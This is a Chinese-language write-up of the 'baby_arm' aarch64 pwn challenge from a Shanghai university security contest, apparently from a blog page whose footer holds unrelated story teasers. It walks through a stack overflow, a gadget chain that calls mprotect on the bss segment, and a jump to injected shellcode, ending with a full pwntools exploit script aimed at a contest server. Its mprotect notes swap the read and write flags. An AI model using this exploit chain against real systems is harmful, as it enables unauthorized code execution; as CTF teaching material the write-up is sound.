[第四届上海市大学生网络安全大赛] baby_arm

  • 题目是道aarch64的pwn题,有关环境搭建之前的文章有讲,然后开了NX,后面打远程的时候发现也确实开了NX
  • 程序主要就是两个read函数写,第一个往bss段写,第二个往栈上写,并且可以栈溢出,这里一看就是rop但是我们没有libc,然后发现程序有个mprotect函数,所以利用思路可以是往bss写shellcode然后利用栈溢出执行mprotect让bss段可以执行,然后再跳转到我们的bss段执行shellcode
include <unistd.h>
#include <sys/mmap.h>
int mprotect(const void *start, size_t len, int prot);

// 对存储映射区保护要求 1、PROT_READ 2、PROT_WRITE 3、PROT_EXEC 4、PROT_NONE
mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。

prot可以取以下几个值,并且可以用“|”将几个属性合起来使用:

1)PROT_READ:表示内存段内的内容可写;

2)PROT_WRITE:表示内存段内的内容可读;

3)PROT_EXEC:表示内存段中的内容可执行;

4)PROT_NONE:表示内存段中的内容根本没法访问。

需要指出的是,指定的内存区间必须包含整个内存页(4K)。区间开始的地址start必须是一个内存页的起始地址,并且区间长度len必须是页大小的整数倍。

  • 函数loc_4008CC可以让我们控制x19,x20,x21,x22,x23,x24,x29,x30寄存器的值,然后通过loc_4008AC函数我们进而控制r0,r1,r2,x3从而达到call x3,最后再ret到下一个函数
loc_4008AC
            LDR X3, [X21,X19,LSL#3]  #将X21寄存器指向的内容给X3寄存器
            MOV X2, X22              #将X22寄存器的值给X2寄存器
            MOV X1, X23              #将X23寄存器的值给X1寄存器
            MOV W0, W24              #将W24寄存器的值给W0寄存器
            ADD X19, X19, #1         #X19寄存器的值+1
            BLR X3                   #执行call X3
            CMP X19, X20             #比较X19寄存器和X20寄存器的值,若不想等则跳转到loc_4008AC
            B.NE loc_400AC

loc_4008CC 
            LDP X19, X20, [SP,#0x10]    #将SP+0x10,SP+0x18给X19,X20寄存器
            LDP X21, X22, [SP,#0x20]    #将SP+0x20,SP+0x28给X21,X22寄存器
            LDP X23, X24, [SP,#0X30]    #将SP+0x30,SP+0x38给X23,X24寄存器
            LDP X29, X30, [SP+0],#0X40  #将SP,SP+8给X29,X30寄存器并抬高栈64字节
                    
  • 所以我们ret到loc_4008CC的时候可以布置栈如下,然后当执行完loc_4008CC函数时,就会ret到X30寄存器的值即loc_4008AC,当执行到BLR X3时相当于执行mprotect(0x411000, 0x1000, 5),然后判断X19和X20是否相等,因为我们提前布置好了所以会继续往下执行到ret返回到0x411068(我们的shellcode处),0x411168在我们第一次往bss段写的时候已经写入了mprotect@plt的地址
$SP-->  │+0x00: 0x0000000000000000   --> X29  
        │+0x08: 0x00000000004008ac   --> X30  
        │+0x10: 0x0000000000000000   --> X19  
        │+0x18: 0x0000000000000001   --> X20
        |+0x20: 0x0000000000411168  -> mprotect@plt  --> X21
        │+0x28: 0x0000000000000005   --> X22  --> X2
        │+0x30: 0x0000000000001000   --> X23  --> Xx
        │+0x38: 0x0000000000411000   --> X24  --> X0
        │+0x40: 0x0000000000000000    
        │+0x48: 0x0000000000411068   --> next X30
        │+0x50: 0x00000000deadbeef  
        │+0x58: 0x00000000deadbeef  
        │+0x60: 0x00000000deadbeef  
        │+0x68: 0x00000000deadbeef  
        │+0x70: 0x00000000deadbeef  
        │+0x78: 0x00000000deadbeef  
  • 第一次ret到通用gadget处
  • 执行完loc_4008CC准备ret到loc_4008AC
  • 进入loc_4008AC函数
  • 执行mprotect(0x411000, 0x1000, 5)
  • 比较X19和X20的值,因为相等所以不跳转往下继续执行
  • 经过4个ldp命令,然后ret,注意此时X30寄存器的值是我们的shellcode地址,所以我们即将执行shellcode了
  • 正在执行shellcode,然后就能getshell了
  • 这里用pwntools生成aarch64的shellcode可能会报错,解决方案,因为我用的deepin所以直接sudo apt-get install binutils-aarch64-linux-gnu一条命令即可,这里因为我已经装了,然后就可以使用shellcode = asm(shellcraft.aarch64.sh()) 快乐的使用shellcode了

exp:

from pwn import *
import sys
import time
context.binary = "./arm_pwn"
binary = './arm_pwn'

if sys.argv[1] == "r":
    p = remote("106.75.126.171",33865)
elif sys.argv[1] == "l":
    p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", binary])
else:
    p = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu/", binary])

elf = ELF("./arm_pwn")


context.log_level = "debug"

buf = asm(shellcraft.aarch64.sh())

buf = buf.ljust(0x100,'\x00')
buf += p64(0x400600)

p.recvuntil('Name:')
p.send(buf.ljust(512,'\x00'))

payload = 'a'*72 + p64(0x4008CC) + p64(0) + p64(0x4008AC) + p64(0) + p64(1) + p64(0x411168) + p64(5)
payload += p64(0x1000) + p64(0x411000) + p64(0) + p64(0x411068) + p64(0xdeadbeef)*6

p.send(payload)
p.interactive()
  • 成功打本地
  • 成功打远程

参考文章:

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,504评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,434评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,089评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,378评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,472评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,506评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,519评论 3 413
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,292评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,738评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,022评论 2 329
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,194评论 1 342
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,873评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,536评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,162评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,413评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,075评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,080评论 2 352

推荐阅读更多精彩内容

  • Return-Oriented-Programming(ROP FTW) Author: Saif El-Sher...
    RealSys阅读 3,315评论 0 2
  • 还是和linux下溢出利用对比。 开启了DEP后,栈的内存空间变成不可执行,无法再把shellcode布置其中然后...
    BJChangAn阅读 1,596评论 0 0
  • 二、集成tomcat 三、集成maven 四、安装testNG插件 1. testNG插件下载地址 2. 查看my...
    果芽软件阅读 430评论 0 3
  • 《1984》是乔治·奥威尔传世作品,和俄国作家尤金·扎米亚金的《我们》以及英国作家赫胥黎《美丽新世界》,并...
    姚常春阅读 1,182评论 0 6
  • 用五年后来看待目前,到底是会觉得好还是坏呢!我又怎么知道呢?一生存在太多的突然,突然的得到突然的失去。在安逸和忙碌...
    Renyuanli阅读 79评论 0 0